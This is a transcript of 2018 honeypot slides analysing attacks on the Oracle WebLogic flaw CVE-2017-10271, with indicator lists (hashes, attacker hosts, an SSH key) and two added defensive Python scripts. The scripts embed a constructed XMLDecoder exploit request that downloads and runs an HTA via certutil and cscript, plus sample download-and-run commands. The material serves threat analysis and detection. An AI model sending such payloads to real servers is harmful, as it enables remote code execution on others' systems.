
Techniques of the attackers targeting the WebLogic vulnerability (CVE-2017-10271)
(WebLogic の脆弱性(CVE-2017-10271)を狙う攻撃者たちの手法)

Slides presented at the 3rd Honeypotter Technical Exchange Meeting (第3回ハニーポッター技術交流会), February 24, 2018, @morihi_soc #hanipo_tech
https://hanipo-tech.connpass.com/event/78002/

Kazuaki Morihisa

February 24, 2018

Transcript

1. whoami
• Kazuaki Morihisa (森久和昭), @morihi_soc
• Day job: security engineer / analyst
• Honeypotter: runs honeypots as a hobby
• Blog → http://www.morihi-soc.net
• Organizer of the Honeypotter Technical Exchange Meeting (ハニーポッター技術交流会)
• Group → https://hanipo-tech.connpass.com
← The blog's "Honeypot Observation Records" (ハニーポット観察記録) series became a book; an e-book edition with a free sample is available:
"Analyzing the Footprints of Cyber Attacks: Honeypot Observation Records" (サイバー攻撃の足跡を分析する ハニーポット観察記録), author: Kazuaki Morihisa, publisher: Shuwa System (秀和システム)
Events I have been involved with so far:
・IT Keys (now SecCap)
・Network Packet Reading Meetup (tentative name)
・NISC Cyber Halloween
・Internet Week
・Hardening Value Chain (winner)
・ssmjp
・AISec
・tktk Security Study Group
2. Agenda [deck p. 3]
• What the WebLogic vulnerability (CVE-2017-10271) is
• Attack detections counted by country
• Analysis of attack frequency
• Reconnaissance of targets, and the attacks themselves
• Which ports were targeted
• Inferring the attacker's environment
• Attack case studies
• Summary
3. What the WebLogic vulnerability (CVE-2017-10271) is [deck p. 4]
• From JVN iPedia:
"Oracle WebLogic Server in Oracle Fusion Middleware has a flaw in the processing related to WLS Security, resulting in a vulnerability that affects confidentiality, integrity and availability."
"A remote attacker may obtain information, tamper with information, or carry out a denial-of-service (DoS) attack."
JVNDB-2017-008734: Vulnerability related to WLS Security in Oracle WebLogic Server of Oracle Fusion Middleware
http://jvndb.jvn.jp/ja/contents/2017/JVNDB-2017-008734.html
→ Publicly released attack tools made remote arbitrary code execution (RCE) possible.
4. Timeline [deck p. 6]
• October 2017: Oracle publishes the fix.
• Late December 2017: attack code is published.
• 2017/12/24: the attack is detected on the honeypot.
• Blog post published: Honeypot Observation Records (38), "Attempted command execution against WLS Security in WebLogic (CVE-2017-10271)"
http://www.morihi-soc.net/?p=910
• As of the presentation: attacks still continuing...
5. A honeypotter's dilemma: criteria for publishing logs [deck p. 7]
• Why only a tweet at the time of detection?
• There was no clear information yet that attack code had been published. Publishing the logs could have enabled copycat attacks, so preventing secondary damage took priority.
• I still wanted to convey the fact that attacks were being detected.
• Afterwards I confirmed that attack tools had been published on GitHub and elsewhere, which led to the blog post.
• By publishing the attack logs I wanted to convey the urgency of applying the patch and how aggressive the attacks were.
6. Security information sharing is hard [deck p. 8]
• There are many channels for sharing security information: IPA, JPCERT/CC and security vendors, and for critical infrastructure NISC's CEPTOARs and IPA's Cyber Information Sharing Initiative (J-CSIP), among others.
• However, the actual substance of attacks is rarely made public.
• Attackers share attack information in underground venues, yet information sharing among security practitioners lags behind.
→ Honeypot data is easy to publish, so I write the blog as a personal activity.
7. Reference: what is vulnerability information worth? [deck p. 9]
• The price of this vulnerability (attack code) was...
Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.1.0/12.2.1.2.0 WLS Security unknown vulnerability
https://vuldb.com/?id.108063
→ While it was a 0-day, the estimate was roughly 11 million to 53 million yen.
8. Attack detections counted by country [deck p. 10]
• Attack logs came from all over the world.
Detections  Country
352  China
331  Ireland
324  United States
168  Seychelles
100  Kazakhstan
 89  Japan
 53  Canada
 47  Hong Kong
 46  Ukraine
 44  Germany
 24  Hungary
 20  Singapore
 12  Colombia
 11  Uruguay
  3  South Korea
  3  Bulgaria
  2  Romania
  2  Netherlands
  1  Russia
  1  Sweden
(The rows sum to 1,633, the total reported on the next slide.)
GeoIP database used: GeoLite2 Country (the file downloaded in February 2018)
https://dev.maxmind.com/ja/geolite2/
9. Analysis of attack frequency [deck p. 11]
[Bar chart: WebLogic attacks per day detected by the honeypot, 2017/12/24 to 2018/2/17; y-axis 0 to 180]
• Attacks detected by the honeypot were aggregated per day.
• The counts include both WebLogic reconnaissance and attacks.
• Peak: 156 attacks in a single day; 1,633 in total.
10. Reconnaissance of targets, and the attacks themselves [deck p. 13]
• Counted per request.
• Inferred roles:
• GET requests probe the content.
• HEAD requests probe the Server header.
• POST requests carry the attack, regardless of the target environment.
[Table: detections by HTTP method (GET, HEAD, POST); the counts did not survive extraction]
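The classification above (GET and HEAD as reconnaissance, POST as the attack), the per-day aggregation of the frequency chart, and the Java-version tally the deck examines later can be reproduced over honeypot records with a short triage script. The following is an added example, not code from the deck or the author's honeypot. It assumes records in the dict shape shown; the exploit path /wls-wsat/CoordinatorPortType and the XMLDecoder <java>/ProcessBuilder payload structure come from the public advisories and proof-of-concept code for CVE-2017-10271, not from the slides, and the sample records and payload (placeholder host attacker.invalid) are constructed.

```python
import re
import xml.etree.ElementTree as ET
from collections import Counter

# Constructed sample payload (not the deck's data): a minimal XMLDecoder
# request of the kind published for CVE-2017-10271. The command chain mirrors
# the certutil-download / cscript-execute pattern the deck describes.
EXPLOIT_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0"><string>cmd.exe</string></void>
<void index="1"><string>/c</string></void>
<void index="2"><string>certutil -urlcache -split -f http://attacker.invalid:8088/weblogic.hta weblogic.hta &amp;&amp; cscript weblogic.hta</string></void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>"""

# Constructed honeypot records (documentation-range source addresses).
SAMPLE_RECORDS = [
    {"ts": "2017-12-24T03:12:09Z", "src": "203.0.113.5", "method": "GET",
     "path": "/", "ua": "Mozilla/5.0 (Windows NT 6.1)", "body": ""},
    {"ts": "2017-12-24T03:12:10Z", "src": "203.0.113.5", "method": "HEAD",
     "path": "/console/login/LoginForm.jsp", "ua": "Mozilla/5.0 (Windows NT 6.1)", "body": ""},
    {"ts": "2017-12-24T03:12:11Z", "src": "203.0.113.5", "method": "POST",
     "path": "/wls-wsat/CoordinatorPortType", "ua": "Java/1.8.0_151", "body": EXPLOIT_BODY},
    {"ts": "2017-12-25T17:40:00Z", "src": "198.51.100.9", "method": "POST",
     "path": "/wls-wsat/CoordinatorPortType11", "ua": "python-requests/2.18.4", "body": EXPLOIT_BODY},
    {"ts": "2017-12-25T18:00:00Z", "src": "198.51.100.9", "method": "POST",
     "path": "/index.php", "ua": "curl/7.55.1", "body": "a=1"},
]

WLS_WSAT_RE = re.compile(r"^/wls-wsat/", re.I)
JAVA_UA_RE = re.compile(r"\bJava/(\d+(?:\.\d+)+(?:_\d+)?)")


def extract_processbuilder_argv(body):
    """Return (java_version, argv) from an XMLDecoder payload, or (None, None).
    The version is the <java version="..."> attribute the tool hard-codes."""
    if "XMLDecoder" not in body:
        return None, None
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None, None
    version = None
    for java in root.iter("java"):  # unqualified tag: no default namespace
        version = java.get("version")
    for void in root.iter("void"):
        if void.get("class") == "java.lang.ProcessBuilder":
            arr = void.find("array")
            if arr is not None:
                return version, [s.text or "" for s in arr.iter("string")]
    return version, None


def classify(rec):
    """Deck's reading: GET probes content, HEAD probes the Server header,
    POST attacks; a POST to /wls-wsat/ with a ProcessBuilder payload is an
    exploitation attempt for CVE-2017-10271."""
    m = rec["method"].upper()
    if m == "GET":
        return "probe-content"
    if m == "HEAD":
        return "probe-server-header"
    if m == "POST":
        _, argv = extract_processbuilder_argv(rec["body"])
        if argv and WLS_WSAT_RE.match(rec["path"]):
            return "exploit-cve-2017-10271"
        return "post-other"
    return "other"


def triage(records):
    """Counts per class and per day, Java versions seen in the User-Agent
    ('ua:') and in the payload ('payload:'), and the extracted commands."""
    per_class, per_day, java_versions, commands = Counter(), Counter(), Counter(), []
    for rec in records:
        label = classify(rec)
        per_class[label] += 1
        per_day[rec["ts"][:10]] += 1
        ua = JAVA_UA_RE.search(rec["ua"])
        if ua:
            java_versions["ua:" + ua.group(1)] += 1
        if label == "exploit-cve-2017-10271":
            version, argv = extract_processbuilder_argv(rec["body"])
            if version:
                java_versions["payload:" + version] += 1
            commands.append((rec["ts"], rec["src"], argv))
    return {"per_class": per_class, "per_day": per_day,
            "java_versions": java_versions, "commands": commands}


if __name__ == "__main__":
    result = triage(SAMPLE_RECORDS)
    for key in ("per_class", "per_day", "java_versions"):
        print(key, dict(result[key]))
    for ts, src, argv in result["commands"]:
        print(ts, src, argv)
```

Matching on the ProcessBuilder element rather than on a literal string keeps the detection independent of the attacker's command, and the extracted argv is what feeds the download-host and dropped-file indicators.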
11. Which ports were targeted [deck p. 14]
• The attackers do not necessarily take the target environment into account; most likely they are attacking indiscriminately.
• Were attacks arriving at ports other than WebLogic's administration port as well?
[Image: port table from "Oracle Fusion Middleware: Administering Oracle Fusion Middleware 12c (12.1.2)", https://docs.oracle.com/cd/E50629_01/core/ASADM/portnums.htm#CHDIACEF, with the WebLogic administration port underlined in red]
12. Inferring the attacker's environment [deck p. 16]
• Tallied the User-Agent of the attack requests.
• A mix of clearly suspicious values and ones that can occur normally.
[Table: User-Agent / count; only a "Mozilla ... Windows NT" entry and the "Other" row survived extraction]
13. Inferring the attacker's environment [deck p. 18]
• Somewhat dated, but JDK-family versions dominate.
• They may also be hard-coded in the attack tool.
[Table: Java version / count; the version numbers did not survive extraction]
Java™ SE Development Kit 8, Update 151 (JDK 8u151), October 17, 2017
http://www.oracle.com/technetwork/java/javase/8u151-relnotes-3850493.html
← the version released in October 2017
• The WebLogic vulnerability information was published in October 2017, which matches the period in which the tool was created.
14. Attack request [deck p. 41]
• Following up on the attack request.
• It simply runs the downloaded script file with the cscript command.
• The attack request is a very unusual combination (see the certutil reference below).
Reference on certutil: "A new technique of macro malware disguised as defense-related files" (Macnica Networks Security Research Center blog)
http://blog.macnica.net/blog/2017/12/post-8c22.html
15. Summary [deck p. 45]
• Introduced the Oracle WebLogic vulnerability (CVE-2017-10271).
• Analysis of the logs from late December 2017 through February 2018 showed that the great majority of the traffic appears to be indiscriminate attacks.
• Judging from the vulnerability disclosure and the estimated creation time of the attack tool, attacks may have been taking place before late December 2017.
• A vulnerable environment would very likely have suffered not only misuse of CPU and network resources but also unauthorized logins and various other impacts.
• The attack logs presented here are only a fraction of the total.
16. IoC [deck p. 46]
MD5 hashes and file names of suspicious files:
01ebeaf06f5a2fcbf14025a8e683293d  cat.php
036b34853622f38c285babf1a8670b62  svchosx.exe
0a6f3934f53966e2bdd4721ba512bd1c  weblogic.hta
0b156ec492ea45d282cf823415ecaf12  IPsecSrv.dll
0d91bd78bfb6eab168ebb697bd5d31a4  transfer-etn.sh
26198be2276b9d7a4cbf4dad4155995d  kworker.sh
2874b491c166d3b3949b2f94182e1759  svvchost.exe
38535ff9e16902305e3d938a5f429879  mssql.exe
3acdb039179e120da05aa2c53542f944  paSmuRYy
3af4c8196fbb3ae1744291bfdeaa6f98  pool.zip
3fb41234895102be5c439132f85c0ef9  payload.py
5aeb79a353888fd552dc7cc129e696a6  dada.x86_64
5c53d65c44e5e7c05c743811487eecdb  x32.exe
5ff51056a25c8b9a20842ea9d05c0495  minerd
8327245a8feb3290de39df5ceefd58bf  start_xmr.ps1
8c8a30372e4fdba50cb2e6ffdb5af883  mssql.exe
929c9eeff262e198fd29f8c75edfc5fd  xrun.exe
9ad4bd564978c1b5a8540b6b6f021bdb  x64.exe
9cde0af2caa9fab7cb042487dfd9ab08  eblue.exe
9f0d6dce1e043858f3d239b101d0b19d  7001.exe
a2ac17c2bb6148b7e22c610964e398d2  rZhqDVLP
a2ce07681d158a13557928457c950ebe  ex32.exe
a4f2b45c832257b5fd662b9eee2f82f1  linuxsyn
b29e0910573f96d8447801814dd2b73e  xrun-etn.exe
b6657f348f5915ae6052e5f9c56343e8  loveby.exe
b8a107d8b0f1e582c86a6def628ab1f3  jiba
bf4ba4b0450a5a436a9ec9dc4b504d72  kefarbo.exe
c357a4ad84dd7c3d4de5f7ab3942a121  minerxmr.exe
c97b69f1bbf36ca94aaa664ea78e16dc  pri.sh
d5aa5b2a023893460b9ef2584d0fa7a8  niao.exe
dbdac5198ffde5c15710176cbd79095c  transfer.sh
df980ebae2a9a83409a3ccd03a5e3603  cross.exe
f50298bbe7226587bd641410849174df  cloud
fdac6a6d0c98e45c3b93d478cd4d0042  18r4m

File download sources and callback destinations (the part after the colon is the port number):
107.181.174.248
111.67.198.104
111.67.198.246
112.30.132.138:2323
120.132.17.180:66
123.249.24.175:8088
132.148.150.15:8080
133.242.163.81:4444
137.59.18.173
18.217.195.175:132
182.18.8.69:8088
185.216.117.85:11152
185.227.152.132:2124
190.60.206.11
190.60.206.11:8443
199.188.104.73:32135
199.188.104.75:32135
204.152.209.251:2114
204.152.209.251:21145
204.152.209.251:221
205.209.177.18
221.9.251.236
222.184.79.11:5317
222.184.79.11:5318
222.184.79.11:5319
222.184.79.11:5320
222.184.79.11:5329
222.186.150.175:8080
222.186.150.175:81
223.68.209.7:65510
27.148.157.89:8899
35.189.171.208:55555
43.226.35.42:2323
46.4.26.204
58.218.201.20:8088
67.218.135.178
80.82.70.234:6969
97.64.19.115
bbc.servehalflife.com
cnhv.co
get.fu2k.net:66
ipfs.fu2k.net
qwer.world
usa.neozju.com
www.kangnajiang.top:132
17. IoC [deck p. 47]
• The attacker's SSH public key (they were attempting to append it to the root user's .ssh/authorized_keys file):
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDV1VxPVZFUOOWZwMFVBwP/904lhAZNj2U5DPsZyIWw33jHeFRElM++XnUYmkMDiu8KuJXnFDJMkyXxsq77fOpDhVGOoexll3+P6SmZWViWwnhOgvxhccgT72J+LPZEIwPqPZQVHR4ksdVSnMVreyZs+rQ7O+L2xychpqzeIrk4Q/08f5XreOnq4Rgxp9oKwSlf7vKmQ7tUWUxfMHHL1wQYZPmdKpgSi/JmokLpp5cKAT7r0gGOj1jV8ZAJc+z45Ts2JBH9JYscHBssh7MBWWymcjXANd9a6XaQnbnl6nOFFNyYm8dBuLkGpEUNCdMq/jc5YLfnAnbGVbBMhuWzaWUp root@host-10-10-10-26
• Pastebin files (defanged: http → hxxp, https → hxxps):
• hxxp://pastebin.com/raw/rZhqDVLP
• hxxps://pastebin.com/raw/paSmuRYy
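The indicators on the two IoC slides are only useful if they are actually swept against evidence: the download hosts in commands recovered from exploit payloads, file hashes, and root's authorized_keys. The following is an added example, not code from the deck. The IoC values are copied from the slides (a subset of the hash list, a subset of the endpoint list, and the SSH key joined into one blob); the command lines and the authorized_keys file are constructed, and pairing a particular host with a particular file name in them is illustrative, not something the deck states.

```python
import base64
import hashlib
import re
from urllib.parse import urlparse

# Indicators copied from the deck (subset). ":port" means that port was the one
# observed and only it matches; an entry without a port matches any port.
IOC_MD5 = {
    "0a6f3934f53966e2bdd4721ba512bd1c": "weblogic.hta",
    "036b34853622f38c285babf1a8670b62": "svchosx.exe",
    "8327245a8feb3290de39df5ceefd58bf": "start_xmr.ps1",
    "dbdac5198ffde5c15710176cbd79095c": "transfer.sh",
    "5ff51056a25c8b9a20842ea9d05c0495": "minerd",
}
IOC_ENDPOINTS = {
    "58.218.201.20:8088", "222.186.150.175:8080", "222.186.150.175:81",
    "190.60.206.11", "190.60.206.11:8443", "bbc.servehalflife.com",
    "get.fu2k.net:66", "www.kangnajiang.top:132", "qwer.world",
}
IOC_SSH_KEY_BLOB = (
    "AAAAB3NzaC1yc2EAAAADAQABAAABAQDV1VxPVZFUOOWZwMFVBwP/904lhAZNj2U5DPsZyIWw33jHeFRElM++XnUYmkMDiu"
    "8KuJXnFDJMkyXxsq77fOpDhVGOoexll3+P6SmZWViWwnhOgvxhccgT72J+LPZEIwPqPZQVHR4ksdVSnMVreyZs+rQ7O+L2xychpqze"
    "Irk4Q/08f5XreOnq4Rgxp9oKwSlf7vKmQ7tUWUxfMHHL1wQYZPmdKpgSi/JmokLpp5cKAT7r0gGOj1jV8ZAJc+z45Ts2JBH9JYscHB"
    "ssh7MBWWymcjXANd9a6XaQnbnl6nOFFNyYm8dBuLkGpEUNCdMq/jc5YLfnAnbGVbBMhuWzaWUp"
)

# Constructed evidence (not from the deck): commands as an exploit payload would
# run them, and an authorized_keys file with a benign admin key (fake blob)
# followed by the attacker's key.
SAMPLE_COMMANDS = [
    "cmd.exe /c certutil -urlcache -split -f http://58.218.201.20:8088/weblogic.hta weblogic.hta && cscript weblogic.hta",
    "/bin/sh -c wget -q -O /tmp/transfer.sh http://190.60.206.11:9999/transfer.sh; sh /tmp/transfer.sh",
    "curl -s http://203.0.113.7/health",
]
SAMPLE_AUTHORIZED_KEYS = """# admin key (fake blob, constructed)
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE admin@bastion
ssh-rsa """ + IOC_SSH_KEY_BLOB + """ root@host-10-10-10-26
"""

URL_RE = re.compile(r"\b(?:https?|hxxps?)://[^\s'\"<>|&;]+", re.I)
AUTH_KEY_RE = re.compile(
    r"(?:^|\s)(ssh-rsa|ssh-ed25519|ecdsa-sha2-nistp\d+)\s+([A-Za-z0-9+/=]+)(?:\s+(.*))?$")


def endpoints_in_command(cmd):
    """host and host:port for every URL in a command line; 'hxxp' defanging
    is undone so pasted IoC URLs work as input too."""
    found = set()
    for url in URL_RE.findall(cmd):
        u = urlparse(re.sub(r"^hxxp", "http", url, flags=re.I))
        if not u.hostname:
            continue
        port = u.port or (443 if u.scheme == "https" else 80)
        found.add(u.hostname)
        found.add(f"{u.hostname}:{port}")
    return found


def match_endpoints(cmd):
    """IoC endpoints referenced by a command line, as a sorted list."""
    return sorted(endpoints_in_command(cmd) & IOC_ENDPOINTS)


def lookup_hash(sample):
    """Dropped-file name for a known MD5 (hex string or raw bytes), else None."""
    digest = hashlib.md5(sample).hexdigest() if isinstance(sample, bytes) else sample.lower()
    return IOC_MD5.get(digest)


def fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint of a key blob; None if not valid base64."""
    try:
        raw = base64.b64decode(blob_b64, validate=True)
    except ValueError:
        return None
    return "SHA256:" + base64.b64encode(hashlib.sha256(raw).digest()).decode().rstrip("=")


def scan_authorized_keys(text):
    """(line_no, key_type, comment, fingerprint) for entries whose blob is the
    attacker's key; comment lines and leading key options are tolerated."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = AUTH_KEY_RE.search(line)
        if m and m.group(2) == IOC_SSH_KEY_BLOB:
            hits.append((n, m.group(1), (m.group(3) or "").strip(), fingerprint(m.group(2))))
    return hits


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(match_endpoints(cmd) or "-", "<-", cmd)
    print(lookup_hash("0a6f3934f53966e2bdd4721ba512bd1c"))
    for hit in scan_authorized_keys(SAMPLE_AUTHORIZED_KEYS):
        print("attacker key in authorized_keys:", hit)
```

Matching the key by blob rather than by comment matters because the comment (root@host-10-10-10-26) is free text the attacker can change; the fingerprint is reported so the finding can be compared against ssh-keygen -lf output on other hosts.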